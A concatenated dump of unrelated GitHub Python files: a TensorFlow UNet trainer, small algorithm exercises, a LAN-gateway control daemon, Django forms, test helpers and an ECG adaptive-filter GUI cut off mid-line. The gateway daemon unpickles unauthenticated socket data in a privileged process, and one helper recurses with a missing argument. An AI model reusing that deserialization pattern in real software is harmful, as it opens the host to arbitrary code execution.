sample)\r\nprint(\"Croping\", sample[IMG].shape, \"to\", sample2[IMG].shape)\r\nprint(\"Orignal\")\r\n# show_sample(sample)\r\nprint(\"Cropped version\")\r\n# show_sample(sample2)\r\n\r\ndef cut_to_many_tf(sample, return_dataset=True):\r\n \"\"\"Cut a padded sample to many images of size IMG_MIN_SIZExIMG_MIN_SIZE.\r\n\r\n Used for validation set where we don't want to use random_crop.\r\n \"\"\"\r\n even_sample, orig_size = pad_to_min_size_tf(sample)\r\n shape = tf.shape(even_sample)\r\n\r\n ch = shape[2]\r\n y = shape[1]\r\n split_y = tf.reshape(even_sample, [-1, IMG_MIN_SIZE, y, ch])\r\n split_num = tf.cast(tf.shape(even_sample)[0]//IMG_MIN_SIZE, dtype=tf.int64)\r\n\r\n def split_in_x(i):\r\n\r\n y0 = tf.cast(i*IMG_MIN_SIZE, dtype=tf.int32)\r\n y1 = tf.cast((i+1)*IMG_MIN_SIZE, dtype=tf.int32)\r\n\r\n img = split_y[:, :, y0:y1, :]\r\n return tf.data.Dataset.from_tensor_slices(img)\r\n\r\n ds = tf.data.Dataset.range(split_num).flat_map(split_in_x)\r\n if return_dataset:\r\n return ds\r\n return tf.contrib.data.get_single_element(ds.batch(1024))\r\n\r\n\r\nnew_samples = run_in_sess(cut_to_many_tf, sample, False)\r\nprint(\"3 first samples extracted from the large sample\", sample.shape)\r\nprint(\"Total amount of samples extracted:\",len(new_samples))\r\n# for s in new_samples[:3]:\r\n# show_sample(s)\r\n\r\n#Making input pipline\r\ndef input_fn(sample_paths, batch_size=1, shuffle=False, num_epochs=1, take=None, load_labels=True):\r\n # Estimator API except a different representation of samples, as tuple of dicts one for features one for labels.\r\n # so we have this small conversion utility\r\n def sample_to_features_n_labels(sample):\r\n return {'image':sample[IMG]}, {'mask': sample[MASK], 'weights': sample[WEIGHTS]}\r\n\r\n sample_paths_tensor = tf.constant(list(map(str, sample_paths)), dtype=tf.string)\r\n\r\n def input_fn():\r\n dataset = tf.data.Dataset.from_tensor_slices(sample_paths_tensor)\r\n\r\n # As you see Dataset.shuffle except a buffer that can hold all samples to correctly shuffle them.\r\n # Since we are starting from paths the buffer does not have to be that large.\r\n if shuffle:\r\n dataset = dataset.shuffle(buffer_size=len(sample_paths))\r\n if take is not None:\r\n dataset = dataset.take(take)\r\n dataset = (dataset\r\n .map(lambda x: load_sample_tf(x, load_mask=load_labels), num_parallel_calls=4)\r\n .cache()) # this does not work that well if the evaluation is being done on the same GPU as training.\r\n\r\n if shuffle:\r\n dataset = dataset.map(random_crop_tf)\r\n else:\r\n dataset = dataset.flat_map(cut_to_many_tf)\r\n\r\n dataset = (dataset.map(sample_to_features_n_labels)\r\n .repeat(num_epochs)\r\n .batch(batch_size)\r\n .prefetch(1)\r\n )\r\n\r\n\r\n\r\n iterator = dataset.make_one_shot_iterator()\r\n # `features` is a dictionary in which each value is a batch of values for\r\n # that feature; `labels` is a batch of labels.\r\n features, labels = iterator.get_next()\r\n return features, labels\r\n return input_fn\r\n\r\nimport time\r\nstart_time = time.time()\r\n\r\nwith tf.Graph().as_default():\r\n it = input_fn(paths.eval, batch_size=1024)()\r\n with tf.Session() as s:\r\n all_eval_samples = (s.run((it)))\r\n print(\"First batch fetched, now the ds should stop\")\r\n try:\r\n nothing = (s.run((it)))\r\n except tf.errors.OutOfRangeError:\r\n print(\"The iterator correctly let us know that it is empty.\")\r\n\r\nimages_loaded = all_eval_samples[0]['image'].shape[0]\r\ntotal_time = (time.time() - start_time)\r\nprint(\"Total execution time %s sec, performance %s samples / sec\" % (total_time, images_loaded/total_time))\r\n\r\n#Small function that let's us display results from input_fn\r\ndef show_features_n_labels(features, labels, max_samples=1):\r\n features = np.array([i for i in features.values()])\r\n labels = np.array([i for i in labels.values()])\r\n\r\n if len(features.shape) not in [4,5]:\r\n raise AttributeError(\"Wrong shape of images\", features.shape)\r\n\r\n if len(features.shape) == 4:\r\n features = np.expand_dims(features)\r\n labels = np.expand_dims(labels)\r\n\r\n ## TODO: make it more efficient at trimming the batch\r\n samples_to_show = min(max_samples, features.shape[1])\r\n for sample_idx in range(0, samples_to_show):\r\n sample = [f for f in features[:,sample_idx,:,:,:]] + [l for l in labels[:,sample_idx,:,:,:]]\r\n # show_image_list(sample)\r\n\r\nshow_features_n_labels(*all_eval_samples, max_samples=2)\r\n\r\n#The Model written in Tensorflow\r\nfrom tensorflow.python.ops import array_ops\r\n\r\ndef conv2d_3x3(filters):\r\n return tf.layers.Conv2D(filters, kernel_size=(3,3), activation=tf.nn.relu, padding='same')\r\n\r\ndef max_pool():\r\n return tf.layers.MaxPooling2D((2,2), strides=2, padding='same')\r\n\r\ndef conv2d_transpose_2x2(filters):\r\n return tf.layers.Conv2DTranspose(filters, kernel_size=(2, 2), strides=(2, 2), padding='same')\r\n\r\ndef concatenate(branches):\r\n return array_ops.concat(branches, 3)\r\n\r\ndef get_model(features, mode, params):\r\n x = features['image']\r\n x = tf.placeholder_with_default(x, [None, None, None, IMG_CHANNELS], name='input_image_placeholder')\r\n\r\n s = x / 255 # convert image to 0 .. 1.0\r\n\r\n c1 = conv2d_3x3(8) (s)\r\n c1 = conv2d_3x3(8) (c1)\r\n p1 = max_pool() (c1)\r\n\r\n c2 = conv2d_3x3(16) (p1)\r\n c2 = conv2d_3x3(16) (c2)\r\n p2 = max_pool() (c2)\r\n\r\n c3 = conv2d_3x3(32) (p2)\r\n c3 = conv2d_3x3(32) (c3)\r\n p3 = max_pool() (c3)\r\n\r\n c4 = conv2d_3x3(64) (p3)\r\n c4 = conv2d_3x3(64) (c4)\r\n p4 = max_pool() (c4)\r\n\r\n c5 = conv2d_3x3(128) (p4)\r\n c5 = conv2d_3x3(128) (c5)\r\n\r\n u6 = conv2d_transpose_2x2(64) (c5)\r\n u6 = concatenate([u6, c4])\r\n c6 = conv2d_3x3(64) (u6)\r\n c6 = conv2d_3x3(64) (c6)\r\n\r\n u7 = conv2d_transpose_2x2(32) (c6)\r\n u7 = concatenate([u7, c3])\r\n c7 = conv2d_3x3(32) (u7)\r\n c7 = conv2d_3x3(32) (c7)\r\n\r\n u8 = conv2d_transpose_2x2(16) (c7)\r\n u8 = concatenate([u8, c2])\r\n c8 = conv2d_3x3(16) (u8)\r\n c8 = conv2d_3x3(16) (c8)\r\n\r\n u9 = conv2d_transpose_2x2(8) (c8)\r\n u9 = concatenate([u9, c1])\r\n c9 = conv2d_3x3(8) (u9)\r\n c9 = conv2d_3x3(8) (c9)\r\n\r\n logits = tf.layers.Conv2D(1, (1, 1)) (c9)\r\n return logits\r\n\r\ndef model_fn(features, labels, mode, params={}):\r\n if mode == tf.estimator.ModeKeys.PREDICT:\r\n f, sh = pad_to_min_size_tf(features['image'], batch=True)\r\n logits = get_model({'image': f}, mode, params)\r\n\r\n mask = tf.nn.sigmoid(logits, name='sigmoid_tensor')\r\n predictions = {\r\n 'mask': mask[:,0:sh[1],0:sh[2],:], # we remove pixels added in pad_to_min_size_tf\r\n 'image': features['image'] # we return the image as well to simplify testing\r\n }\r\n\r\n export_outputs={'generate' : tf.estimator.export.PredictOutput(predictions)}\r\n return tf.estimator.EstimatorSpec(mode=mode,\r\n predictions=predictions,\r\n export_outputs=export_outputs)\r\n logits = get_model(features, mode, params)\r\n predictions = {\r\n 'mask': tf.nn.sigmoid(logits, name='sigmoid_tensor'),\r\n }\r\n print(\"\\n Prediction:\",predictions)\r\n\r\n true_mask = tf.reshape(tf.clip_by_value(labels['mask'], 0.0 ,1.0), [-1, 128,128,1])\r\n\r\n print(\"\\n True mask:\",true_mask)\r\n\r\n weights = labels['weights']\r\n loss = tf.losses.sigmoid_cross_entropy(multi_class_labels=true_mask,\r\n logits=logits,\r\n weights=weights)\r\n\r\n # Configure the training op\r\n if mode == tf.estimator.ModeKeys.TRAIN:\r\n optimizer = tf.train.AdamOptimizer(learning_rate=1e-4)\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n train_op = optimizer.minimize(loss, tf.train.get_or_create_global_step())\r\n\r\n else:\r\n train_op = None\r\n\r\n with tf.variable_scope('mean_iou_calc'):\r\n prec = []\r\n up_opts = []\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n predicted_mask = tf.to_int32(predictions['mask'] > t)\r\n score, up_opt = tf.metrics.mean_iou(true_mask, predicted_mask, 2)\r\n up_opts.append(up_opt)\r\n prec.append(score)\r\n mean_iou = tf.reduce_mean(tf.stack(prec), axis=0), tf.stack(up_opts)\r\n print(\"\\n Predicted_mask:\", predicted_mask)\r\n\r\n eval_metrics = {'mean_iou': mean_iou}\r\n\r\n return tf.estimator.EstimatorSpec(\r\n mode=mode,\r\n predictions=predictions,\r\n loss=loss,\r\n train_op=train_op,\r\n eval_metric_ops=eval_metrics)\r\n\r\nrun_config = tf.estimator.RunConfig(keep_checkpoint_max=2)\r\nestimator = tf.estimator.Estimator(\r\n model_fn=model_fn,\r\n model_dir=\"./model_output/\"+MODEL_NAME,\r\n config=run_config)\r\n\r\n# In case you want to profile this model here is a profile hook. To use it add hooks=[profiler_hook] to TrainSpec.\r\ntf.gfile.MakeDirs('timelines/'+MODEL_NAME)\r\nprofiler_hook = tf.train.ProfilerHook(\r\n save_steps=1000,\r\n save_secs=None,\r\n output_dir='timelines/'+MODEL_NAME,\r\n show_dataflow=True,\r\n show_memory=True)\r\n\r\ninput_fns = TE(input_fn(paths.train,\r\n batch_size=128,\r\n shuffle=False,\r\n num_epochs=10),\r\n input_fn(paths.eval, batch_size=10, shuffle=False),)\r\nspecs = TE(tf.estimator.TrainSpec(input_fn=input_fns.train, max_steps=STEPS_IN_TRAINING),\r\n tf.estimator.EvalSpec(input_fn=input_fns.eval, steps=STEPS_IN_EVALUATION, throttle_secs=600))\r\n\r\ntf.estimator.train_and_evaluate(estimator, specs.train, specs.eval)\r\n\r\n# def final_mask(\r\nprint(\"Finish!\")\r\n#\r\n# input(\"Press Enter\")\r\n# #PREDICTION\r\n# #This part is very similar to the one provided in keras kernel, we look at the predictions then convert them to RLE.\r\n# #What is worth noting is that we put whole images from Test set without scaling to the model one by one.\r\n# #This is possible because UNet is fully convolutional network without fully connected layers so it does not care about the size\r\n# #of the image as long as it is divisible by the IMG_MIN_SIZE. Otherwise it will break on concanation layers.\r\n# #\r\n# # img = Image.open(\"D:\\\\UNET in Tensorflow\\\\Unet_Tensor\\\\dataset\\\\image_test\\\\PNG\\\\2.png\")\r\n# # image_predict = estimator.predict(img)\r\n# # print(image_predict['image'])\r\n# train_pred = next(iter(estimator.predict(input_fns.train)))\r\n# print(train_pred['image'])\r\n# print(train_pred['mask'])\r\n# show_image_list([train_pred['image'], train_pred['mask']*255])\r\n#\r\n# eval_pred = next(iter(estimator.predict(input_fns.eval)))\r\n# show_image_list([eval_pred['image'], eval_pred['mask']])\r\n\r\n\r\n# test_paths = list(sorted(TEST_PATH.glob(\"*\")))\r\n# def pred_input_fn(paths):\r\n# paths=list(map(str, paths))\r\n#\r\n# def input_fn():\r\n# ds = (tf.data.Dataset.from_tensor_slices(paths)\r\n# .map(lambda x: load_sample_tf(x, load_mask=False))\r\n# .map(lambda x: ({\"image\": x[IMG]}, {\"mask\": tf.zeros_like(x[IMG])})).batch(1))\r\n# iterator = ds.make_one_shot_iterator()\r\n# return iterator.get_next()\r\n# return input_fn\r\n#\r\n# thr=0.5\r\n# pred = next(iter(estimator.predict(pred_input_fn(test_paths))))\r\n# preds_test = []\r\n# preds_test_t = []\r\n# for path, pred in zip(test_paths, estimator.predict(pred_input_fn(test_paths))):\r\n# # print(path)\r\n# mask = np.squeeze(pred['mask'])\r\n# preds_test_t.append((mask > thr).astype(np.uint8))\r\n# preds_test.append(mask)\r\n","repo_name":"naternguyen/Unet-Segmentation","sub_path":"unet_tf.py","file_name":"unet_tf.py","file_ext":"py","file_size_in_byte":19190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"36728884273","text":"def ispallindrome(n):\n temp=n\n rev=0\n while(n>0):\n d=n%10\n n=n//10\n rev=rev*10+d\n if(rev==temp):\n return 1\nn=int(input())\ni=1\na=0\nb=0\nwhile(i<=10):\n if(ispallindrome(n+i)==1):\n a=n+i\n break\n #print(a)\n i+=1\nj=1\nwhile(j<=10):\n if(ispallindrome(n-j)==1):\n b=n-j\n #print(b)\n break\n j+=1\n#print(n,a,b,end=\" \")\nif(abs(n-b)==abs(a-n)):\n print(b,a,end=\" \")\nelif(abs(n-b)<=abs(a-n)):\n print(b)\nelse:\n print(a)","repo_name":"21A91A05C6/codemind-python","sub_path":"Closest_Palindrome_.py","file_name":"Closest_Palindrome_.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"32001322351","text":"# BFS\n# queue 이용\n# 각 층계 돌 떄 마다 list에 값 넣고 길이 만큼 나눈 뒤 result에 삽입\n\nclass Solution:\n def averageOfLevels(self, root: TreeNode) -> List[float]:\n if not root:\n return None\n queue = [root]\n result = []\n while queue:\n newResult = []\n newQueue = []\n for i in queue:\n newResult.append(i.val)\n if i.left:\n newQueue.append(i.left)\n if i.right:\n newQueue.append(i.right)\n result.append(sum(newResult)/len(newResult))\n queue = newQueue[:]\n return result\n","repo_name":"plan-bug/LeetCode-Challenge","sub_path":"microcephalus7/categories/Tree/637.py","file_name":"637.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"} +{"seq_id":"16043141984","text":"import config\nimport os, struct, traceback\nimport socket, pickle\nimport traceback\nfrom ipset import IpsetError\nfrom managed import Net, User, get_ip, get_mac\nfrom log import logger, init_logger\n\n\"\"\"\nThis is the main script for langate2000-netcontrol.\nThis component is an interface between the langate2000 web pages and\nthe kernel network components of the gateway used during the events.\n\nHaving this component in between is important because we don't want the web server\nto have privileged access to kernel components as it is needed for this script.\n\nBoth the langate2000 django server and this components communicate using UNIX sockets.\nThe messages exchanged begin with the size of the payload (as a 4 bytes int) followed by\nthe payload itself. The payload is always a pickle-encoded python dict.\n\nExample format of a *query* payload, sent by langate2000 webserver :\n\n {\n \"query\": \"get_mac\",\n \"ip\": \"172.16.1.20\"\n }\n\nThe query parameter is mandatory and reflect the name of the function you want to call in the\nipset class.\n\nExample format of a *response* payload, sent back by this daemon :\n\n {\n \"success\": True,\n \"mac\": \"ff:ff:ff:ff:ff\"\n }\n\nThe success parameter is mandatory and is a boolean value.\nIf False, the only other value in the dict is the corresponding error message raised \nby the ipset class.\n\nNote that this daemon needs to be executed on the same machine as the one that serves the pages because it needs to access the ARP tables to find the mac adresses of the hosts that are using the web server.\n\n\"\"\"\n\nnet = Net(mark=config.mark)\n\n# the 3 following helper functions were taken from https://stackoverflow.com/questions/17667903/python-socket-receive-large-amount-of-data\n\ndef _send(sock, data):\n pack = struct.pack('>I', len(data)) + data\n sock.sendall(pack)\n\ndef _recv_bytes(sock, size):\n data = b''\n while len(data) < size:\n r = sock.recv(size - len(data))\n if not r:\n return None\n data += r\n return data\n\ndef _recv(sock):\n data_length_r = _recv_bytes(sock, 4)\n\n if not data_length_r:\n return None\n\n data_length = struct.unpack('>I', data_length_r)[0]\n return _recv_bytes(sock, data_length)\n \n\ndef parse_query(p):\n response = {\n \"success\": True\n }\n\n try:\n\n if p[\"query\"] == \"connect_user\":\n net.connect_user(p[\"mac\"], p[\"name\"].replace('\"',''))\n elif p[\"query\"] == \"disconnect_user\":\n net.disconnect_user(p[\"mac\"])\n elif p[\"query\"] == \"get_user_info\":\n response[\"info\"] = net.get_user_info(p[\"mac\"]).to_dict()\n elif p[\"query\"] == \"set_mark\":\n net.set_vpn(p[\"mac\"], p[\"mark\"])\n elif p[\"query\"] == \"clear\":\n net.clear()\n elif p[\"query\"] == \"destroy\":\n net.delete()\n elif p[\"query\"] == \"get_ip\":\n response[\"ip\"] = get_ip(p[\"mac\"])\n elif p[\"query\"] == \"get_mac\":\n response[\"mac\"] = get_mac(p[\"ip\"])\n else:\n raise NotImplementedError\n\n except IpsetError as e:\n return {\n \"success\": False,\n \"message\": str(e)\n }\n\n else:\n return response\n\nif os.path.exists(config.netcontrol_socket_file):\n os.remove(config.netcontrol_socket_file)\n\nwith socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as server:\n logger.setLevel(10) # INFO\n init_logger()\n logger.info(\"Binding socket at \\\"{}\\\"\".format(config.netcontrol_socket_file))\n server.bind(config.netcontrol_socket_file)\n\n logger.info(\"Listening on \\\"{}\\\".\".format(config.netcontrol_socket_file))\n\n while True:\n try:\n server.listen(1)\n client, _ = server.accept()\n logger.debug(\"Incoming connection\")\n\n # TODO: authenticate packet\n q = pickle.loads(_recv(client))\n\n r = parse_query(q)\n\n _send(client, pickle.dumps(r))\n logger.debug(\"Order finished\")\n client.close()\n except Exception:\n traceback.print_exc()\n","repo_name":"InsaLan/langate2000-netcontrol","sub_path":"netcontrol.py","file_name":"netcontrol.py","file_ext":"py","file_size_in_byte":4051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"7813078906","text":"from copy import deepcopy\nfrom typing import Any, Dict\n\nfrom aspen.database.models import PhyloTree\n\n\ndef create_id_mapped_tree(input_json: dict, prefix) -> dict:\n clone = deepcopy(input_json)\n clone[\"tree\"][\"name\"] = f\"{clone['tree']['name']}\"\n for node in clone[\"tree\"][\"children\"]:\n node[\"GISAID_ID\"] = f\"{node['name']}\"\n node[\"name\"] = node[\"name\"].replace(\"public\", \"private\")\n return clone\n\n\ndef add_subtree_prefixes(subtree, prefix):\n for node in subtree:\n node[\"name\"] = f\"{node['name']}\"\n if \"children\" in node:\n add_subtree_prefixes(node[\"children\"])\n\n\ndef add_prefixes(input_json: dict, prefix: str) -> dict:\n clone = deepcopy(input_json)\n clone[\"tree\"][\"name\"] = f\"{clone['tree']['name']}\"\n add_subtree_prefixes(clone[\"tree\"][\"children\"], prefix)\n return clone\n\n\ndef align_json_with_model(input_json: dict, phylo_tree: PhyloTree) -> dict:\n uploaded_children = []\n for index, sample in enumerate(phylo_tree.constituent_samples):\n child: Dict[str, Any] = dict()\n if index < len(input_json[\"tree\"][\"children\"]):\n child |= input_json[\"tree\"][\"children\"][index]\n else:\n child |= {\n \"node_attrs\": {\"country\": {\"value\": \"USA\"}},\n }\n child |= {\"name\": sample.public_identifier}\n uploaded_children.append(child)\n input_json[\"tree\"][\"children\"] = uploaded_children\n return input_json\n","repo_name":"chanzuckerberg/czgenepi","sub_path":"src/backend/aspen/api/views/tests/utils/phylo_tree_utils.py","file_name":"phylo_tree_utils.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"} +{"seq_id":"33157570269","text":"from django import forms\nfrom subjects.models import Subject, Comment\nfrom mptt.forms import TreeNodeChoiceField\n\nclass CreateSubjectForm(forms.ModelForm):\n\n class Meta:\n model = Subject\n fields = ('title', 'details','github_url', 'document_file')\n\n\nclass CreateCommentForm(forms.ModelForm):\n\n parent = TreeNodeChoiceField(queryset = Comment.objects.all())\n\n class Meta:\n model = Comment\n fields = ('text','parent',)\n \n def __init__(self, *args, **kwargs):\n super(CreateCommentForm, self).__init__(*args, **kwargs)\n self.fields['parent'].required = False\n","repo_name":"ankit0tech/Research-Productivity-Tool","sub_path":"subjects/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"38419255995","text":"from tkinter.filedialog import askopenfilename\r\nimport os\r\nimport tkinter as tk\r\nfrom tkinter import * # 图形界面库\r\nimport tkinter.messagebox as messagebox # 弹窗\r\nfrom ttkbootstrap import Style\r\nfrom PIL import Image, ImageTk\r\nimport threading\r\nimport tkinter.font as tf\r\nimport numpy as np\r\nfrom Filters import LMS_AdaFilter, RLS_AdaFilter, noise_generator,NLMS_AdaFilter\r\nfrom Application import getSNR, getMSE, getFeature\r\nimport matplotlib.pyplot as plt\r\nimport scipy.signal as sig\r\n\r\n\r\nclass AdapFilterGUI:\r\n def __init__(self,root):\r\n self.initGUI(root)\r\n\r\n\r\n def initGUI(self,root):\r\n self.style = Style(theme='lumen')\r\n self.window = root\r\n self.window = self.style.master\r\n self.window.title('AdapFilter')\r\n self.window.geometry('1280x750+120+25')\r\n self.window.iconphoto(True, tk.PhotoImage(file='tt1.png'))\r\n self.data_path = StringVar()\r\n self.data_path.set(os.path.abspath(\".\"))\r\n ft = tf.Font(family='微软雅黑', size=11)\r\n self.fm = tk.LabelFrame(self.window, text='主面板',font=ft, width=1200, height=720)\r\n self.left = tk.Frame(self.fm, bg='white', width=400, height=720)\r\n self.data_input = tk.LabelFrame(self.left, text='数据载入',font=ft, width=400, height=90)\r\n self.nos_setting = tk.LabelFrame(self.left, text='非平稳噪声设置',font=ft, width=400, height=90)\r\n self.flt_setting = tk.LabelFrame(self.left, text='滤波器设置',font=ft, width=400, height=220)\r\n self.eval = tk.LabelFrame(self.left, text='效果评价',font=ft, width=400, height=200)\r\n self.feature = tk.LabelFrame(self.left, text='R波分析',font=ft, width=400, height=150)\r\n\r\n self.right = tk.Frame(self.fm, bg='white', width=800, height=720)\r\n self.org_show = tk.LabelFrame(self.right, text='原始信号',font=ft, width=800, height=220)\r\n self.nos_show = tk.LabelFrame(self.right, text='加噪信号',font=ft, width=800, height=220)\r\n self.flt_show = tk.LabelFrame(self.right, text='滤波信号',font=ft, width=800, height=220)\r\n\r\n self.fm.grid(row=0, column=0, padx=15, pady=10,ipadx=3,ipady=3)\r\n self.left.grid(row=0, column=0, padx=10, pady=3)\r\n self.right.grid(row=0, column=1, padx=10, pady=3)\r\n self.data_input.grid(row=0, column=0, padx=0, pady=6)\r\n self.nos_setting.grid(row=1, column=0, padx=0, pady=6)\r\n self.flt_setting.grid(row=2, column=0, padx=0, pady=6)\r\n self.eval.grid(row=3, column=0, padx=0, pady=6)\r\n self.feature.grid(row=4, column=0, padx=0, pady=6)\r\n self.org_show.grid(row=0, column=0, padx=5, pady=2)\r\n self.org_show.pack_propagate(0)\r\n self.nos_show.grid(row=1, column=0, padx=5, pady=2)\r\n self.nos_show.pack_propagate(0)\r\n self.flt_show.grid(row=2, column=0, padx=5, pady=2)\r\n self.flt_show.pack_propagate(0)\r\n\r\n self.showLen = 1000\r\n self.ok = 0\r\n self.f1 = None\r\n self.f2 = None\r\n self.f3 = None\r\n\r\n #信号输入\r\n Label(self.data_input, text=\"选择路径: \",font=ft).grid(row=0, column=0, padx=3, pady=2)\r\n Entry(self.data_input, textvariable=self.data_path,width=27,font=ft).grid(row=0, column=1, padx=2, pady=2)\r\n Button(self.data_input, text=\"打开文件\",width=33,bd=2,relief='groove',font=ft, command=lambda:self.selectData()).grid(row=1, column=0,columnspan=2, padx=0, pady=5)\r\n\r\n #噪声设置\r\n self.snr = StringVar(value='10')\r\n Label(self.nos_setting, text=\"信噪比: \",font=ft).grid(row=1, column=0, padx=20, pady=2)\r\n Label(self.nos_setting, text=\"dB\",font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Entry(self.nos_setting, textvariable=self.snr, width=8,font=ft).grid(row=1, column=1,padx=0, pady=2)\r\n Button(self.nos_setting, text=\"确定\",bd=2,font=ft,relief='groove',width=8, command=lambda: self.getNoise()).grid(row=1, column=3,padx=20, pady=2)\r\n\r\n #滤波器设置\r\n Label(self.flt_setting, text=\"自适应算法选择\", font=ft, width=18).grid(row=0, column=0, padx=0, pady=2)\r\n Label(self.flt_setting, text=\"参数设置\", font=ft, width=18).grid(row=0, column=1,columnspan=2, padx=0, pady=2)\r\n v = tk.IntVar()\r\n af1 = tk.Radiobutton(self.flt_setting, text='LMS', font=ft, variable=v, value=1)\r\n af2 = tk.Radiobutton(self.flt_setting, text='NLMS', font=ft, variable=v, value=2)\r\n af3 = tk.Radiobutton(self.flt_setting, text='RLS', font=ft, variable=v, value=3)\r\n af1.grid(row=1, column=0, padx=0, pady=2)\r\n af2.grid(row=2, column=0, padx=0, pady=2)\r\n af3.grid(row=3, column=0, padx=0, pady=2)\r\n\r\n self.mu = StringVar(value='0.05')\r\n self.N = StringVar(value='4')\r\n Label(self.flt_setting, text=\"步长因子:\", font=ft).grid(row=1, column=1, padx=0, pady=2)\r\n Label(self.flt_setting, text=\"滑窗大小:\", font=ft).grid(row=2, column=1, padx=0, pady=2)\r\n Entry(self.flt_setting, textvariable=self.mu, width=8,font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Entry(self.flt_setting, textvariable=self.N, width=8,font=ft).grid(row=2, column=2, padx=0, pady=2)\r\n Button(self.flt_setting, text=\"确定\", width=12,bd=2,font=ft,relief='groove',command=lambda: self.getFlt(v.get())).grid(row=3, column=1,columnspan=2, padx=0,pady=2)\r\n\r\n\r\n #评价\r\n self.snr0 = tk.StringVar()\r\n self.snr1 = tk.StringVar()\r\n self.mse0 = tk.StringVar()\r\n self.mse1 = tk.StringVar()\r\n Label(self.eval, text=\"滤波前\", font=ft).grid(row=1, column=1, padx=0, pady=2)\r\n Label(self.eval, text=\"滤波后\", font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Label(self.eval, text=\"SNR\", font=ft).grid(row=2, column=0, padx=0, pady=2)\r\n Label(self.eval, text=\"MSE\", font=ft).grid(row=3, column=0, padx=0, pady=2)\r\n self.old_snr=Label(self.eval, width=10,textvariable=self.snr0,bd=1,relief='groove')\r\n self.old_snr.grid(row=2, column=1, padx=0, pady=2)\r\n self.new_snr = Label(self.eval, width=10,textvariable=self.snr1,bd=1,relief='groove')\r\n self.new_snr.grid(row=2, column=2, padx=0, pady=2)\r\n\r\n self.old_mse = Label(self.eval, width=10,textvariable=self.mse0,bd=1,relief='groove')\r\n self.old_mse.grid(row=3, column=1, padx=0, pady=2)\r\n self.new_mse = Label(self.eval, width=10,textvariable=self.mse1,bd=1,relief='groove')\r\n self.new_mse.grid(row=3, column=2, padx=0, pady=2)\r\n Button(self.eval, text=\"分 析\", width=35, bd=2, font=ft, relief='groove',command=lambda: self.showEval()).grid(row=4, column=0,columnspan=3, padx=5,pady=2)\r\n\r\n #特征提取\r\n self.hr = tk.StringVar()\r\n self.rr = tk.StringVar()\r\n Label(self.feature, text=\"心率\", font=ft).grid(row=1, column=0, padx=0, pady=2)\r\n Label(self.feature, text=\"R-R间期\", font=ft).grid(row=2, column=0, padx=0, pady=2)\r\n Label(self.feature, text=\"次/分\", font=ft).grid(row=1, column=2, padx=0, pady=2)\r\n Label(self.feature, text=\"s\", font=ft).grid(row=2, column=2, padx=0, pady=2)\r\n self.hrshow = Label(self.feature, width=10,textvariable=self.hr,bd=1,relief='groove')\r\n self.hrshow.grid(row=1, column=1, padx=0, pady=2)\r\n self.rrshow = Label(self.feature, width=10,textvariable=self.rr,bd=1,relief='groove')\r\n self.rrshow.grid(row=2, column=1, padx=0, pady=2)\r\n Button(self.feature, text=\"分 析\", width=35, bd=2, font=ft, relief='groove', command=lambda: self.showFeat()).grid(row=3, column=0, columnspan=3, padx=5, pady=2)\r\n\r\n self.window.mainloop() # 主消息循环\r\n\r\n #选择输入信号数据路径\r\n def selectData(self):\r\n path_ = askopenfilename() # 使用askdirectory()方法返回文件夹的路径\r\n if path_ == \"\":\r\n self.data_path.get() # 当打开文件路径选择框后点击\"取消\" 输入框会清空路径,所以使用get()方法再获取一次路径\r\n else:\r\n path_ = path_.replace(\"/\", \"\\\\\") # 实际在代码中执行的路径为“\\“ 所以替换一下\r\n self.data_path.set(path_)\r\n if '.npy' in path_:\r\n self.getData()\r\n else:\r\n messagebox.showinfo('错误!', '文件格式出错')\r\n\r\n #评价指标计算并显示\r\n def showEval(self):\r\n if self.ok == 2:\r\n snr0 = getSNR(self.org,self.noise_data)\r\n snr1 = getSNR(self.org[:len(self.flt_data)],self.flt_data)\r\n self.snr0.set(str(round(snr0, 2)))\r\n self.snr1.set(str(round(snr1, 2)))\r\n\r\n mse0 = getMSE(self.org,self.noise_data) * 1000\r\n mse1 = getMSE(self.org[:len(self.flt_data)],self.flt_data) * 1000\r\n self.mse0.set(str(round(mse0, 2)))\r\n self.mse1.set(str(round(mse1, 2)))\r\n else:\r\n messagebox.showinfo('错误!', '请重新操作')\r\n\r\n #R波分析结果计算并显示\r\n def showFeat(self):\r\n if self.ok == 2:\r\n rr,hr = getFeature(self.flt_data)\r\n self.hr.set(str(round(hr, 1)))\r\n self.rr.set(str(round(rr, 2)))\r\n\r\n data_mean = np.mean(self.flt_data[-self.showLen:])\r\n p_id, _ = sig.find_peaks(self.flt_data[-self.showLen:], distance=70, height=data_mean*1.1)\r\n p_val = self.flt_data[-self.showLen:][p_id] # 取出峰值对应的幅值\r\n global rPic\r\n plt.figure()\r\n plt.plot(p_id, p_val, 'ro')\r\n plt.plot(self.flt_data[-self.showLen:])\r\n plt.axis('off')\r\n plt.savefig(\"r.png\", bbox_inches='tight')\r\n img4 = Image.open('r.png')\r\n img4 = img4.resize((800, 220))\r\n rPic = ImageTk.PhotoImage(img4)\r\n self.f3.configure(image = rPic )\r\n self.f3.image = rPic\r\n\r\n else:\r\n messagebox.showinfo('错误!', '请重新操作')\r\n\r\n\r\n\r\n #读取数据\r\n def getData(self):\r\n self.org = np.load(self.data_path.get())[:-100]\r\n self.show(1)\r\n self.ok = 1\r\n\r\n #获取加噪信号\r\n def getNoise(self):\r\n if self.ok == 1:\r\n self.noise = noise_generator(self.org, float(self.snr.get()))\r\n self.noise_data = self.org + self.noise\r\n self.show(2)\r\n self.ok = 2\r\n else:\r\n messagebox.showinfo('错误!', 